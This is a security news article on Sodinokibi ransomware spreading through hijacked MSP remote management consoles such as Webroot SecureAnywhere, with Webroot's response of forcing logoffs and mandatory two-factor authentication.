Hackers use Webroot SecureAnywhere console to spread Sodinokibi ransomware

Malicious actors behind Sodinokibi ransomware hacked MSPs to spread the malicious payload via the Webroot SecureAnywhere console

Sodinokibi ransomware spread via Webroot SecureAnywhere console after hackers accessed its remote management tools

Threat actors behind Sodinokibi ransomware^[1] managed to hack into at least three managed service providers (MSPs) and used remote management tools to distribute the malicious malware payload via the Webroot SecureAnywhere console.^[2] The news came to light when Reddit user posted the revelation on the MSP message board.^[3]

Among other affected tools, reports claim that Kaseya VSA was also affected by the compromise and was used to deliver Sodinokibi ransomware.

After the compromise, attackers managed to deploy “1488.bat” script, which is very similar to the one used in GandCrab ransomware attacks,^[4] which also disabled the management console. Nevertheless, in Sodinokibi ransomware case, the source of the incident was compromised credentials rather than the vulnerability.

Hackers managed to breach through via the Remote Desktop

According to findings by Kyle Hanslovan, a CEO of security firm Huntress Lab, the hackers managed to breach MSPs servers with the help of Remote Desktop connection and then elevated their privileges to those of administrator's, which let them uninstall security applications, such as Webroot or ESET.

After disabling anti-malware software, threat actors remotely connected to MSPs clients' machines that ran Webroot SecureAnywhere console. This tool was then used to run PowerShell scripts and install the malicious Sodinokibi payload from Pastebin page, which was immediately removed upon the discovery (although non-malicious version was posted on Github).^[5]

According to the limited research that was conducted so far, it was discovered that Webroot is the most likely target since its console allows administrators to download and execute files on machines remotely. With hackers hijacking it, infecting users with malware becomes a much easier task.

Webroot made its customers to enable two factor authentication to protect them from the potential danger or ransomware infection

In response to the incident, Webroot started messaging its customers, claiming that “a small number” of users were impacted by the hack, although the company is working on fixing the situation and ensuring their online safety.

In the e-mail that users received, Webroot stated that it is forcefully enabling the two-factor authentication feature for all the customers to prevent any possible system compromise:^[6]

Recently, Webroot's Advanced Malware Removal team discovered that a small number of customers were impacted by threat actors who could have been thwarted with more consistent cyber hygiene. We immediately began working with those customers to remediate any impact.

As a proactive measure to help ensure all our customers are following security best practices, we initiated an automated console logoff at 3 a.m. EDT on June 20 and are implementing mandatory 2FA in the Webroot Management Console.

While Sodinokibi ransomware is a relatively new threat (it was first spotted^[7] by security experts at the end of April 2019), it is not the first time its authors use managed service providers and the remote management tools to infect customers with the malware.

The affected Webroot users are now being forced to enable 2FA function, although it does not mean that similar attacks cannot happen on other consoles.